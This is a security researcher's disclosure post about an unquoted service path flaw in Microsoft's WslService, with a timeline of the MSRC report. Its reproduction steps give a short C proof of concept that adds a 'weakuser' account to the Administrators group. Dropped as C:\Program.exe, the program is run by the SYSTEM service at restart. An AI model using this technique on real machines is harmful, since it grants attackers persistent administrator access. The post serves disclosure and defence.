Microsoft WslService Unquoted Service Path

By Uriel Kosayev @MalFuzzer


WslService is a deployed service that exists on Windows machines with the WSL (Windows Subsystem for Linux) installed. This vulnerability can be exploited by an attacker during the post-exploitation phase to achieve code execution, privilege escalation, and persistence, by using the technique of implanting an arbitrary unsigned executable which is executed by a signed service that runs with the NT AUTHORITY\SYSTEM privileges on the victim machine.

The Vulnerability

Service in the Windows operating system is susceptible to “Unquoted Service Path” vulnerability if the executable path is not wrapped with quotation marks. In this case, the “WslService” Windows service is executed with the “CreateProcessAsUserW” Windows API function as can be seen below:

Malware Analysis Courses and Workshops

The “CreateProcessAsUserW” Windows API function receives several parameters such as the “lpApplicationName” parameter that has a value of the module/file name or the full path to the module/file, and in this case, with no quotation marks which leads to this vulnerability.

To exploit such vulnerability, an attacker needs to drop a file that will be executed after a computer or service is restarted, either through an administrative account or by abusing a service path followed by an insufficient permission so that any weak user with a “W” (write) permission, for instance, can write to this path without the need of an administrative account. Below you can see Microsoft’s explanation of the “lpApplicationName” parameter:

Malware Analysis Courses and Workshops

And here below you can see that when the “WslService” is executed, it’s running under the escalated privileged context of NT AUTHORITY\SYSTEM:

Malware Analysis Courses and Workshops

PoC Reproduction Steps

    • Service enumeration on n endpoint where WSL is installed:

Malware Analysis Courses and Workshops


    • Compile the following Persistence PoC code:
  • #include <Windows.h>
    void main()
    system("net user weakuser /add");
    system("net localgroup Administrators weakuser /add");
    • Put the compiled PE-executable in the C:\ drive named Program.exe:Malware Analysis Courses and Workshops
    • Restart the computer and execute the following command to validate that a user named “weakuser” is created and assigned under the “Administrators” group.

Past Experiences with Such Vulns

Throughout out my career I’ve seen many such vulnerabilities, exploited them in my clients red team engagements, even two CVEs: CVE-2020–8842, and CVE-2020–12307. For some reasons known to them, Microsoft decided not to assign it a CVE nor a bounty, but I hope that at least they will fix it.

Disclosure Timeline

Jul 4th, 2023 — Vulnerability reported to MSRC.

Jul 5th, 2023 — Initial response from MSRC.

Jul 19th, 2023 — MSRC labeled as “fixed” but nor bounty or CVE were issued.